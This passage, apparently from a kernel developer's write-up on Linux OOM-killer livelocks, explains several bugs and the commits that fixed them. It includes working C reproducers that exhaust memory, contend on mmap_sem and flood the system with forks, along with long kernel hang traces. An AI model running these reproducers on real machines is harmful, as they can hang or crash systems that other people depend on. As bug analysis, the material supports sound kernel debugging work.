0*4096kB = 0kB [ 93.082034] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB ---------- Example output end ----------
oom-depleter2 is a reproducer which exceptionally requires privileges, in order to read kernel messages and run with realtime priority. But since the privileges are needed for nothing but strictly controlling the timing, it would be possible to reproduce the problem from an unprivileged user's process if the timing happens to match.
After all, since it turned out that it is safe to send the SIGKILL signal between task_lock() and task_unlock(), this bug was fixed by commit 426fb5e72d92b868 ("mm/oom_kill.c: reverse the order of setting TIF_MEMDIE and sending SIGKILL").
When asynchronous memory reclaim by kswapd cannot keep up, memory is synchronously reclaimed using direct reclaim. Therefore, when many processes start memory allocation requests at the same time, they all perform direct reclaim. As a result, especially on kernels built with CONFIG_PREEMPT=y in order to improve responsiveness, the OOM killer cannot complete its operation within a realistic duration once it is invoked. And this bug still remains even after the OOM reaper was introduced.
---------- oom_preempt.c ----------
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>

static cpu_set_t set = { { 1 } }; /* Allow only CPU 0. */
static char filename[32] = { };

/* down_read(&mm->mmap_sem) requester. */
static int reader(void *unused)
{
	const int fd = open(filename, O_RDONLY);
	char buffer[128];
	sched_setaffinity(0, sizeof(set), &set);
	sleep(2);
	while (pread(fd, buffer, sizeof(buffer), 0) > 0);
	while (1)
		pause();
	return 0;
}

/* down_write(&mm->mmap_sem) requester. */
static int writer(void *unused)
{
	const int fd = open("/proc/self/exe", O_RDONLY);
	sleep(2);
	while (1) {
		void *ptr = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
		munmap(ptr, 4096);
	}
	return 0;
}

static void my_clone(int (*func) (void *))
{
	char *stack = malloc(4096);
	if (stack)
		clone(func, stack + 4096,
		      CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL);
}

/* Memory consumer for invoking the OOM killer. */
static void memory_eater(void)
{
	char *buf = NULL;
	unsigned long i;
	unsigned long size = 0;
	sleep(4);
	for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
		char *cp = realloc(buf, size);
		if (!cp) {
			size >>= 1;
			break;
		}
		buf = cp;
	}
	fprintf(stderr, "Start eating memory\n");
	for (i = 0; i < size; i += 4096)
		buf[i] = '\0'; /* Will cause OOM due to overcommit */
}

int main(int argc, char *argv[])
{
	int i;
	const pid_t pid = fork();
	if (pid == 0) {
		for (i = 0; i < 9; i++)
			my_clone(writer);
		writer(NULL);
		_exit(0);
	} else if (pid > 0) {
		snprintf(filename, sizeof(filename), "/proc/%u/stat", pid);
		for (i = 0; i < 100000; i++)
			my_clone(reader);
	}
	memory_eater();
	return *(char *) NULL; /* Not reached. */
}
---------- oom_preempt.c ----------
---------- Example output start ---------- [ 54.702339] oom_preempt invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0 [ 54.705590] oom_preempt cpuset=/ mems_allowed=0 [ 74.525856] CPU: 0 PID: 4436 Comm: oom_preempt Not tainted 4.7.0-rc5 #57 [ 74.528056] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 74.530951] 0000000000000286 00000000a8634c59 ffff88007a8ab9f8 ffffffff812c32a7 [ 74.533292] ffff88007a8abbe0 0000000000000000 ffff88007a8aba90 ffffffff81188781 [ 74.535723] ffffffff810fde71 0000000000000001 0000000000000003 ffff88007fffdb10 [ 74.538167] Call Trace: [ 74.539653] [<ffffffff812c32a7>] dump_stack+0x4f/0x68 [ 74.541537] [<ffffffff81188781>] dump_header+0x5b/0x200 [ 74.543392] [<ffffffff810fde71>] ? delayacct_end+0x51/0x60 [ 74.545329] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 74.547618] [<ffffffff815dce13>] ? _raw_spin_unlock_irqrestore+0x13/0x30 [ 74.549894] [<ffffffff811187d1>] oom_kill_process+0x221/0x420 [ 74.551888] [<ffffffff81117e1b>] ? find_lock_task_mm+0x4b/0x80 [ 74.553936] [<ffffffff81118cad>] out_of_memory+0x28d/0x480 [ 74.556059] [<ffffffff8111d20a>] __alloc_pages_nodemask+0xa5a/0xc20 [ 74.558245] [<ffffffff811143ff>] ? __page_cache_alloc+0xaf/0xc0 [ 74.560278] [<ffffffff81162563>] alloc_pages_current+0x83/0x110 [ 74.562319] [<ffffffff811143ff>] __page_cache_alloc+0xaf/0xc0 [ 74.564328] [<ffffffff81116fda>] filemap_fault+0x27a/0x500 [ 74.566237] [<ffffffff81246859>] xfs_filemap_fault+0x39/0x60 [ 74.568308] [<ffffffff8113d58e>] __do_fault+0x6e/0xf0 [ 74.570182] [<ffffffff8114236c>] handle_mm_fault+0x163c/0x2280 [ 74.572131] [<ffffffff815d8fc9>] ? __schedule+0x1c9/0x590 [ 74.574015] [<ffffffff810497bd>] __do_page_fault+0x19d/0x510 [ 74.575898] [<ffffffff81049b51>] do_page_fault+0x21/0x70 [ 74.577656] [<ffffffff8100259d>] ? do_syscall_64+0xed/0xf0 [ 74.579503] [<ffffffff815de9b2>] page_fault+0x22/0x30 [ 240.447847] INFO: task oom_reaper:47 blocked for more than 120 seconds. [ 240.450075] Not tainted 4.7.0-rc5 #57 [ 240.451571] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 240.453723] oom_reaper D ffff88007cdb3ce8 0 47 2 0x00000000 [ 240.455892] ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824 [ 240.458302] ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00 [ 240.460546] ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783 [ 240.462840] Call Trace: [ 240.463963] [<ffffffff815d93ca>] schedule+0x3a/0x90 [ 240.465586] [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20 [ 240.467430] [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150 [ 240.469236] [<ffffffff815db3a2>] mutex_lock+0x12/0x22 [ 240.470843] [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0 [ 240.472730] [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220 [ 240.476670] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 240.478486] [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40 [ 240.480660] [<ffffffff811183f6>] oom_reaper+0x86/0x170 [ 240.482313] [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0 [ 240.484137] [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50 [ 240.485837] [<ffffffff8107b5e3>] kthread+0xd3/0xf0 [ 240.487417] [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40 [ 240.489090] [<ffffffff8107b510>] ? 
kthread_create_on_node+0x1a0/0x1a0 [ 299.096125] Mem-Info: [ 299.097266] active_anon:392824 inactive_anon:2094 isolated_anon:0 [ 299.097266] active_file:0 inactive_file:0 isolated_file:0 [ 299.097266] unevictable:0 dirty:0 writeback:0 unstable:0 [ 299.097266] slab_reclaimable:1744 slab_unreclaimable:10750 [ 299.097266] mapped:369 shmem:2160 pagetables:2098 bounce:0 [ 299.097266] free:12955 free_pcp:159 free_cma:0 [ 341.098578] Node 0 DMA free:7260kB min:404kB low:504kB high:604kB active_anon:6708kB inactive_anon:108kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:108kB slab_reclaimable:20kB slab_unreclaimable:408kB kernel_stack:688kB pagetables:432kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:20 all_unreclaimable? yes [ 360.494674] INFO: task oom_reaper:47 blocked for more than 120 seconds. [ 360.494675] Not tainted 4.7.0-rc5 #57 [ 360.494676] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 360.494678] oom_reaper D ffff88007cdb3ce8 0 47 2 0x00000000 [ 360.494680] ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824 [ 360.494681] ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00 [ 360.494682] ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783 [ 360.494683] Call Trace: [ 360.494689] [<ffffffff815d93ca>] schedule+0x3a/0x90 [ 360.494690] [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20 [ 360.494691] [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150 [ 360.494693] [<ffffffff815db3a2>] mutex_lock+0x12/0x22 [ 360.494695] [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0 [ 360.494697] [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220 [ 360.494698] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 360.494700] [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40 [ 360.494701] [<ffffffff811183f6>] oom_reaper+0x86/0x170 [ 360.494703] [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0 [ 360.494705] [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50 [ 360.494706] [<ffffffff8107b5e3>] kthread+0xd3/0xf0 [ 360.494708] [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40 [ 360.494709] [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0 [ 391.435178] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 86s! [ 391.435180] Showing busy workqueues and worker pools: [ 391.435181] workqueue events: flags=0x0 [ 391.435186] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256 [ 391.435196] pending: vmpressure_work_fn, vmstat_shepherd [ 391.435200] workqueue events_freezable_power_: flags=0x84 [ 391.435201] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 391.435205] in-flight: 30:disk_events_workfn [ 391.435226] workqueue xfs-eofblocks/sda1: flags=0xc [ 391.435227] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 391.435231] in-flight: 72:xfs_eofblocks_worker [ 391.435234] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105 [ 391.435236] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=86s workers=2 manager: 77 [ 421.515615] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 116s! 
[ 421.515617] Showing busy workqueues and worker pools: [ 421.515618] workqueue events: flags=0x0 [ 421.515620] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256 [ 421.515627] pending: vmpressure_work_fn, vmstat_shepherd [ 421.515631] workqueue events_power_efficient: flags=0x80 [ 421.515633] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 421.515636] pending: check_lifetime [ 421.515637] workqueue events_freezable_power_: flags=0x84 [ 421.515638] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 421.515641] in-flight: 30:disk_events_workfn [ 421.515657] workqueue xfs-eofblocks/sda1: flags=0xc [ 421.515659] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 421.515662] in-flight: 72:xfs_eofblocks_worker [ 421.515666] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105 [ 421.515667] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=116s workers=2 manager: 77 [ 451.596127] BUG: workqueue lockup - pool cpus=3 node=0 flags=0x0 nice=0 stuck for 146s! [ 451.596129] Showing busy workqueues and worker pools: [ 451.596130] workqueue events: flags=0x0 [ 451.596151] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=2/256 [ 451.596158] pending: vmpressure_work_fn, vmstat_shepherd [ 451.596162] workqueue events_power_efficient: flags=0x80 [ 451.596163] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 451.596166] pending: check_lifetime [ 451.596167] workqueue events_freezable_power_: flags=0x84 [ 451.596168] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 451.596172] in-flight: 30:disk_events_workfn [ 451.596187] workqueue xfs-eofblocks/sda1: flags=0xc [ 451.596188] pwq 6: cpus=3 node=0 flags=0x0 nice=0 active=1/256 [ 451.596191] in-flight: 72:xfs_eofblocks_worker [ 451.596194] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=4 idle: 7916 214 105 [ 451.596196] pool 6: cpus=3 node=0 flags=0x0 nice=0 hung=146s workers=2 manager: 77 [ 480.496878] INFO: task oom_reaper:47 blocked for more than 120 seconds. [ 480.496879] Not tainted 4.7.0-rc5 #57 [ 480.496880] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 480.496883] oom_reaper D ffff88007cdb3ce8 0 47 2 0x00000000 [ 480.496885] ffff88007cdb3ce8 ffff88007cdb3d10 ffff88007cdb4000 ffffffff8183f824 [ 480.496886] ffff88007cce6a00 00000000ffffffff ffffffff8183f828 ffff88007cdb3d00 [ 480.496887] ffffffff815d93ca ffffffff8183f820 ffff88007cdb3d10 ffffffff815d9783 [ 480.496888] Call Trace: [ 480.496893] [<ffffffff815d93ca>] schedule+0x3a/0x90 [ 480.496895] [<ffffffff815d9783>] schedule_preempt_disabled+0x13/0x20 [ 480.496896] [<ffffffff815db2e0>] __mutex_lock_slowpath+0xa0/0x150 [ 480.496897] [<ffffffff815db3a2>] mutex_lock+0x12/0x22 [ 480.496900] [<ffffffff81117eba>] __oom_reap_task+0x6a/0x1e0 [ 480.496904] [<ffffffff8107fc8e>] ? finish_task_switch+0x1be/0x220 [ 480.496905] [<ffffffff8108041e>] ? preempt_count_add+0x9e/0xb0 [ 480.496907] [<ffffffff815dd028>] ? _raw_spin_lock_irqsave+0x18/0x40 [ 480.496908] [<ffffffff811183f6>] oom_reaper+0x86/0x170 [ 480.496911] [<ffffffff8109b400>] ? prepare_to_wait_event+0xf0/0xf0 [ 480.496912] [<ffffffff81118370>] ? exit_oom_victim+0x50/0x50 [ 480.496915] [<ffffffff8107b5e3>] kthread+0xd3/0xf0 [ 480.496917] [<ffffffff815dd50f>] ret_from_fork+0x1f/0x40 [ 480.496918] [<ffffffff8107b510>] ? kthread_create_on_node+0x1a0/0x1a0 (Notice that "Out of memory: Kill process" line is not yet printed despite 7 minutes has elapsed after "invoked oom-killer:" line is printed.) ---------- Example output end ----------
Allocating and releasing memory are extremely frequent operations. In addition, Linux is designed to run on anything from single-CPU systems to systems with thousands of CPUs. If memory usage statistics (vmstat) were tracked in global variables updated under exclusive locking, the performance penalty would be significant. Therefore, to avoid this performance problem, memory usage is maintained on a per-CPU basis and synchronized periodically or on demand. Upon periodic synchronization, a vmstat_update work request is sent to the system_wq workqueue.
But while the system_wq workqueue is processing some other work request, it cannot process the vmstat_update work request. Thus, if a work request on system_wq blocks inside a memory allocation, the vmstat_update work request is never processed and the memory usage statistics are never updated; meanwhile the in-flight allocation request keeps seeing the outdated statistics and retries forever due to the "too small to fail" memory-allocation rule. As a result, the system enters an infinite loop without being able to invoke the OOM killer.
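To make the dependency concrete, here is a minimal kernel-module sketch of my own devising (the module and its names are hypothetical; queue_work(), system_wq, GFP_NOIO and the other symbols are real kernel APIs). It queues to system_wq a work item that performs a memory allocation; under heavy memory pressure such a work item can keep retrying inside the page allocator, and while it occupies the worker, a vmstat_update work request queued behind it on the same CPU never gets a chance to run.
---------- wq-hog.c (illustrative sketch) ----------
#include <linux/module.h>
#include <linux/workqueue.h>
#include <linux/gfp.h>

/* Work function which can get stuck retrying inside the page allocator. */
static void hog_fn(struct work_struct *work)
{
        /*
         * A "too small to fail" GFP_NOIO allocation; under OOM conditions
         * this call keeps retrying inside the page allocator instead of
         * returning NULL, keeping this worker busy indefinitely.
         */
        struct page *page = alloc_page(GFP_NOIO);

        if (page)
                __free_page(page);
}

static DECLARE_WORK(hog_work, hog_fn);

static int __init hog_init(void)
{
        /* Same workqueue that the periodic vmstat_update request uses. */
        queue_work(system_wq, &hog_work);
        return 0;
}

static void __exit hog_exit(void)
{
        flush_work(&hog_work);
}

module_init(hog_init);
module_exit(hog_exit);
MODULE_LICENSE("GPL");
---------- wq-hog.c (illustrative sketch) ----------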
---------- Example output start ---------- [ 271.579276] MemAlloc: kworker/0:56(7399) gfp=0x2400000 order=0 delay=129294 [ 271.581237] ffff88007c78fa08 ffff8800778f8c80 ffff88007c790000 ffff8800778f8c80 [ 271.583329] 0000000002400000 0000000000000000 ffff8800778f8c80 ffff88007c78fa20 [ 271.585391] ffffffff8162aa9d 0000000000000001 ffff88007c78fa30 ffffffff8162aac7 [ 271.587463] Call Trace: [ 271.588512] [<ffffffff8162aa9d>] preempt_schedule_common+0x18/0x2b [ 271.590243] [<ffffffff8162aac7>] _cond_resched+0x17/0x20 [ 271.591830] [<ffffffff8111fafe>] __alloc_pages_nodemask+0x64e/0xcc0 [ 271.593561] [<ffffffff8116a3b2>] ? __kmalloc+0x22/0x190 [ 271.595119] [<ffffffff81160ce7>] alloc_pages_current+0x87/0x110 [ 271.596778] [<ffffffff812e95f4>] bio_copy_kern+0xc4/0x180 [ 271.598342] [<ffffffff810a6a00>] ? wait_woken+0x80/0x80 [ 271.599878] [<ffffffff812f25f0>] blk_rq_map_kern+0x70/0x130 [ 271.601481] [<ffffffff812ece35>] ? blk_get_request+0x75/0xe0 [ 271.603100] [<ffffffff814433fd>] scsi_execute+0x12d/0x160 [ 271.604657] [<ffffffff81443524>] scsi_execute_req_flags+0x84/0xf0 [ 271.606339] [<ffffffffa01db742>] sr_check_events+0xb2/0x2a0 [sr_mod] [ 271.608141] [<ffffffff8109cbfc>] ? set_next_entity+0x6c/0x6a0 [ 271.609830] [<ffffffffa01cf163>] cdrom_check_events+0x13/0x30 [cdrom] [ 271.611610] [<ffffffffa01dbb85>] sr_block_check_events+0x25/0x30 [sr_mod] [ 271.613429] [<ffffffff812fc7eb>] disk_check_events+0x5b/0x150 [ 271.615065] [<ffffffff812fc8f1>] disk_events_workfn+0x11/0x20 [ 271.616699] [<ffffffff810827c5>] process_one_work+0x135/0x310 [ 271.618321] [<ffffffff81082abb>] worker_thread+0x11b/0x4a0 [ 271.620018] [<ffffffff810829a0>] ? process_one_work+0x310/0x310 [ 271.622022] [<ffffffff81087e53>] kthread+0xd3/0xf0 [ 271.623533] [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0 [ 271.625487] [<ffffffff8162f09f>] ret_from_fork+0x3f/0x70 [ 271.627175] [<ffffffff81087d80>] ? kthread_create_on_node+0x1a0/0x1a0 ---------- Example output end ----------
The output above, produced by kmallocwd, reports that a workqueue item performing a GFP_NOIO memory allocation request has been retrying for 129 seconds so far. Judging from my experience of reproducing various OOM livelock situations, if the disk_events_workfn() function keeps calling the __alloc_pages_nodemask() function like this, the system is presumably already in an OOM livelock situation, and waiting any longer is unlikely to help. (The reason I wrote "A drive recognized as /dev/sr0" in the target environments is that the management task for the CD-ROM drive periodically issues GFP_NOIO memory allocation requests, which lets us obtain traces like the one shown above.)
This situation has the same root cause as being unable to invoke the OOM killer via SysRq-f. It is difficult to predict the behavior once all the general-purpose, jack-of-all-trades workqueues become busy. If every work item were given its own dedicated workqueue, we could avoid the "never processed forever" problem, but at the same time we would be wasting resources.
Since this problem could not be left unresolved, a dedicated workqueue was assigned to the vmstat work item. Specifically, commit 373ccbe5927034b5 ("mm, vmstat: allow WQ concurrency to discover memory reclaim doesn't make any progress"), commit 751e5f5c753e8d44 ("vmstat: allocate vmstat_wq before it is used") and commit 564e81a57f9788b1 ("mm, vmstat: fix wrong WQ sleep when memory reclaim doesn't make any progress") were applied. Note that this problem also affects RHEL 6/7.
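For reference, the shape of the fix, as I read those commits (refer to linux.git for the authoritative code; the helper function names below are mine), is roughly the following fragment in the context of mm/vmstat.c. The key is WQ_MEM_RECLAIM, which guarantees a rescuer thread so that the vmstat work can still run even when every ordinary worker is stuck in memory reclaim.
---------- sketch of the vmstat_wq fix ----------
/* Dedicated workqueue for vmstat work items (instead of system_wq). */
static struct workqueue_struct *vmstat_wq;

static int __init setup_vmstat_wq(void)  /* illustrative function name */
{
        vmstat_wq = alloc_workqueue("vmstat",
                                    WQ_FREEZABLE | WQ_SYSFS | WQ_MEM_RECLAIM,
                                    0);
        return vmstat_wq ? 0 : -ENOMEM;
}

static void kick_vmstat_update(int cpu)  /* illustrative function name */
{
        /* vmstat_work is the per-CPU struct delayed_work in mm/vmstat.c. */
        queue_delayed_work_on(cpu, vmstat_wq, &per_cpu(vmstat_work, cpu),
                              round_jiffies_relative(sysctl_stat_interval));
}
---------- sketch of the vmstat_wq fix ----------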
This is a problem discovered at the same time as the vmstat_update problem described above. To avoid OOM livelock situations, the judgment of whether to retry an allocation request before invoking the OOM killer was made stricter in stages. While this modification was being tested, it turned out that the OOM killer could be invoked trivially and prematurely, even without real memory pressure, simply by repeating file I/O.
---------- fileio2.c ----------
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>

int main(int argc, char *argv[])
{
        int i;
        static char buffer[4096];
        signal(SIGCHLD, SIG_IGN);
        for (i = 0; i < 2; i++) {
                int fd;
                int j;
                snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i);
                fd = open(buffer, O_RDWR | O_CREAT, 0600);
                memset(buffer, 0, sizeof(buffer));
                for (j = 0; j < 1048576 * 1000 / 4096; j++) /* 1000 is MemTotal / 2 */
                        write(fd, buffer, sizeof(buffer));
                close(fd);
        }
        for (i = 0; i < 2; i++) {
                if (fork() == 0) {
                        int fd;
                        snprintf(buffer, sizeof(buffer), "/tmp/file.%u", i);
                        fd = open(buffer, O_RDWR);
                        memset(buffer, 0, sizeof(buffer));
                        while (fd != EOF) {
                                lseek(fd, 0, SEEK_SET);
                                while (read(fd, buffer, sizeof(buffer)) ==
                                       sizeof(buffer));
                        }
                        _exit(0);
                }
        }
        if (fork() == 0) {
                execl("./fork", "./fork", NULL);
                _exit(1);
        }
        if (fork() == 0) {
                sleep(1);
                execl("./fork", "./fork", NULL);
                _exit(1);
        }
        while (1)
                system("pidof fork | wc");
        return 0;
}
---------- fileio2.c ----------
---------- fork.c ----------
#include <unistd.h>
#include <signal.h>

int main(int argc, char *argv[])
{
        int i;
        signal(SIGCHLD, SIG_IGN);
        while (1) {
                sleep(5);
                for (i = 0; i < 2000; i++) {
                        if (fork() == 0) {
                                sleep(3);
                                _exit(0);
                        }
                }
        }
}
---------- fork.c ----------
---------- Example output start ---------- [ 277.863985] Node 0 DMA32 free:20128kB min:5564kB low:6952kB high:8344kB active_anon:108332kB inactive_anon:8252kB active_file:985160kB inactive_file:615436kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5904kB shmem:8524kB slab_reclaimable:52088kB slab_unreclaimable:59748kB kernel_stack:31280kB pagetables:55708kB unstable:0kB bounce:0kB free_pcp:1056kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 277.884512] Node 0 DMA32: 3438*4kB (UME) 791*8kB (UME) 3*16kB (UM) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20128kB [ 291.331040] Node 0 DMA32 free:29500kB min:5564kB low:6952kB high:8344kB active_anon:126756kB inactive_anon:8252kB active_file:821500kB inactive_file:604016kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:12684kB shmem:8524kB slab_reclaimable:56808kB slab_unreclaimable:99804kB kernel_stack:58448kB pagetables:92552kB unstable:0kB bounce:0kB free_pcp:2004kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 291.349097] Node 0 DMA32: 4221*4kB (UME) 1971*8kB (UME) 436*16kB (UME) 141*32kB (UME) 8*64kB (UM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44652kB [ 302.897985] Node 0 DMA32 free:28240kB min:5564kB low:6952kB high:8344kB active_anon:79344kB inactive_anon:8248kB active_file:1016568kB inactive_file:604696kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:80kB writeback:0kB mapped:13004kB shmem:8520kB slab_reclaimable:52076kB slab_unreclaimable:64064kB kernel_stack:35168kB pagetables:48552kB unstable:0kB bounce:0kB free_pcp:1384kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 302.916334] Node 0 DMA32: 4304*4kB (UM) 1181*8kB (UME) 59*16kB (UME) 7*32kB (ME) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 27832kB [ 311.014501] Node 0 DMA32 free:22820kB min:5564kB low:6952kB high:8344kB active_anon:56852kB inactive_anon:11976kB active_file:1142936kB inactive_file:582040kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:160kB writeback:0kB mapped:10796kB shmem:16640kB slab_reclaimable:48608kB slab_unreclaimable:41912kB kernel_stack:16560kB pagetables:30876kB unstable:0kB bounce:0kB free_pcp:948kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:128 all_unreclaimable? no [ 311.034251] Node 0 DMA32: 6*4kB (U) 2401*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 19232kB [ 314.293371] Node 0 DMA32 free:15244kB min:5564kB low:6952kB high:8344kB active_anon:82496kB inactive_anon:11976kB active_file:1110984kB inactive_file:467400kB unevictable:0kB isolated(anon):0kB isolated(file):88kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:9440kB shmem:16640kB slab_reclaimable:53684kB slab_unreclaimable:72536kB kernel_stack:40048kB pagetables:67672kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:12 all_unreclaimable? 
no [ 314.314336] Node 0 DMA32: 1180*4kB (UM) 1449*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16312kB [ 322.774181] Node 0 DMA32 free:19780kB min:5564kB low:6952kB high:8344kB active_anon:68264kB inactive_anon:17816kB active_file:1155724kB inactive_file:470216kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:8kB writeback:0kB mapped:9744kB shmem:24708kB slab_reclaimable:52540kB slab_unreclaimable:63216kB kernel_stack:32464kB pagetables:51856kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 322.796256] Node 0 DMA32: 86*4kB (UME) 2474*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20136kB [ 330.804341] Node 0 DMA32 free:22076kB min:5564kB low:6952kB high:8344kB active_anon:47616kB inactive_anon:17816kB active_file:1063272kB inactive_file:685848kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:216kB writeback:0kB mapped:9708kB shmem:24708kB slab_reclaimable:48536kB slab_unreclaimable:36844kB kernel_stack:12048kB pagetables:25992kB unstable:0kB bounce:0kB free_pcp:776kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 330.826190] Node 0 DMA32: 1637*4kB (UM) 1354*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17380kB [ 332.828224] Node 0 DMA32 free:15544kB min:5564kB low:6952kB high:8344kB active_anon:63184kB inactive_anon:17784kB active_file:1215752kB inactive_file:468872kB unevictable:0kB isolated(anon):0kB isolated(file):68kB present:2080640kB managed:2021100kB mlocked:0kB dirty:312kB writeback:0kB mapped:9116kB shmem:24708kB slab_reclaimable:49912kB slab_unreclaimable:50068kB kernel_stack:21600kB pagetables:42384kB unstable:0kB bounce:0kB free_pcp:1364kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 332.846805] Node 0 DMA32: 4108*4kB (UME) 897*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 23608kB [ 341.054731] Node 0 DMA32 free:20512kB min:5564kB low:6952kB high:8344kB active_anon:76796kB inactive_anon:23792kB active_file:1053836kB inactive_file:618588kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1656kB writeback:0kB mapped:19768kB shmem:32784kB slab_reclaimable:49000kB slab_unreclaimable:47636kB kernel_stack:21664kB pagetables:37188kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 341.073722] Node 0 DMA32: 3309*4kB (UM) 1124*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 